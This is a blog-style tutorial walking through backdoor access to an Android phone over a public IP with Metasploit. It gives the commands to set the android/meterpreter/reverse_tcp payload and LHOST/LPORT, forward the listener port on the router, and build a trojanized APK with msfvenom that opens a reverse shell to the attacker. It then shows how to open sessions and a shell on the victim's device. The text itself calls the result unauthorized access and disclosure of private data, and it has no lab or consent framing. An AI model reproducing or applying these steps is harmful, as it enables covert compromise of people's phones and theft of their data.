by hash3liZer . 12 April 2018
Welcome to the Metasploit Exploitation tutorial. In this tutorial, we will be gaining backdoor access to an android target with metasploit over Public IP. We will be working around the metasploit exploit handler with executable meterpreter android payload for the remote access.
Metasploit is an exploitation framework, used by researchers for breaking into various vulnerable systems with a designed set of exploits. It provides a reasonable updated database of exploits with various payloads and other modules, used to perform malign tasks on target window like sniffing keystrokes, executing arbitrary shell commands and silently taking snapshots etc.
Besides, everything else metasploit offers. Its basic purpose is to test appropriate application through discovered loopholes.
Android is a well-targeted operating system. To preserve its state, these systems are well-maintained and updated and firewalls of such systems are well-acquainted with the execution of exploits. So, there might be chances that the target firewall may understand the nature of exploit while the payload is still taking coverage.
A major understanding of Command line environment and command syntax and the knowledge of basic commands like ip route. Metasploit installed. This tutorial is explained on the basis of Kali Linux as attacker OS and Android KitKat as target OS.
Open the console (terminal). Check the weekly updates and make changes to metasploit if necessary or if any new modules are detected. Doing so will keep you informed of newly added modules and exploits.
After that, start postgresql database service. Metasploit uses postgresql as the storage server. This will enable us to quickly navigate and search through metasploit modules, preventing the slow search issue that wastes time while systematizing the output.
systemctl enable postgresql systemctl start postgresql
Enabling the postgresql will start it everytime the system boots. Now, there's no need to perform this step, next time, metasploit is going to flash.
Type msfconsole in terminal and press [Enter]. It will take a few seconds to bring the interface up to its fully functional state.
Search for an appropriate exploit for target OS using search command. Our target is an android smartphone. So, the query for an Android could be like:
search type:exploit platform:android
It will list the exploits available for android platform. You can get help on metasploit commands by typing help followed by a space with command name such as help search. It will print the manual for search command. Here's the output for android exploit search:
From the given list of exploits as shown in the image, we will use the generic exploit as highlighted. Now, to use the exploit, enter this command:
There is a set of payloads given for every single exploit. These payloads are actually the exploit modules that provides a backbone environment for transferring and executing commands on target window. Different payloads are used according to the given scenario and by guessing how much working space of target is required. Well, to show the payloads given for an exploit. Type in:
From the given set of payloads, we will use android/meterpreter/reverse_tcp. It's a great versatile payload to get started with. It will bring us a meterpreter session if payload executes unspotted. This meterpreter payload presents a handful list of directives which are useful enough to wholly compromise the target system.
set PAYLOAD android/meterpreter/reverse_tcp
Attain the information of exploit using info command. This is the key step to get an idea, how actually the exploit works. It will give you the background information like what could be the possible targets and what the core of vulnerability is.
At this point, we know the working of exploit. Now, we have to setup the options for our exploit which are LHOST for local address of attacker and LPORT for the local port to use. To find local IP address type.
So, my local IP is 192.168.1.10. Set LHOST and LPORT
set LHOST 192.168.1.10 set LPORT 777 # Port for establishing connections
Make sure that both of the paramters are correctly modified.
Run the exploit as a job. The exploit will execute in the background and will notify you whenever the payload executes on the target system. Afterward, we will use sessions command to launch (target) session.
Find the Gateway IP of your Network and navigate to that IP through a web browser and login. Type:
Now, open a web browser and login to Router administrative Page.
After successful login, enable the port 777 so that firewall allows the client and attacker machines to forward and receive traffic. You probably don't know how to forward a port on your router. For doing so, go to portforward.com, search for your router company and model and follow the instructions for your router.
For generating the infected (payload) application with extension .apk, we will use msfvenom, native payload generator of Metasploit framework. Open a new console (terminal) and generate a Simple Payload Application for android.
msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=Public IP Address (attacker) LPORT=777
Now, as soon the spawned apk file will operate on an android Operating System (target). Metasploit terminal which we have left open will bring us a live target session. List the available sessions:
Now, to interact with a session. Just type in the session identifier (ID) after the sessions directive. It will take you to the meterpreter shell.
sessions [n] # [n] is the ID of available sessions
Meterpreter terminal will be launched. Type help command. It will list a handful of commands from getting system info to starting live Chat.
meterpreter > help
Ignore meterpreter > . Its just there to indicate that its a meteterpreter session.
Lets try the shell command. It will bring us the terminal or cmd (if windows) of target system. Try to execute a command.
meterpreter > shell
We have seen to gain unauthorized confidential access to an Android Smartphone with metasploit and seen to disclose private data of target with a given set of meterpreter commands. Before, you proceed to a lively target, make sure you are well-acquainted with all the possible consequences of such a theft. They may lead to disastrous impacts. As already mentioned, metasploit is just a vulnerability assessment Project. Its main intention to get familiarize with how powerful a loophole could be and which sectors of a system could it give access to leave compromised actions.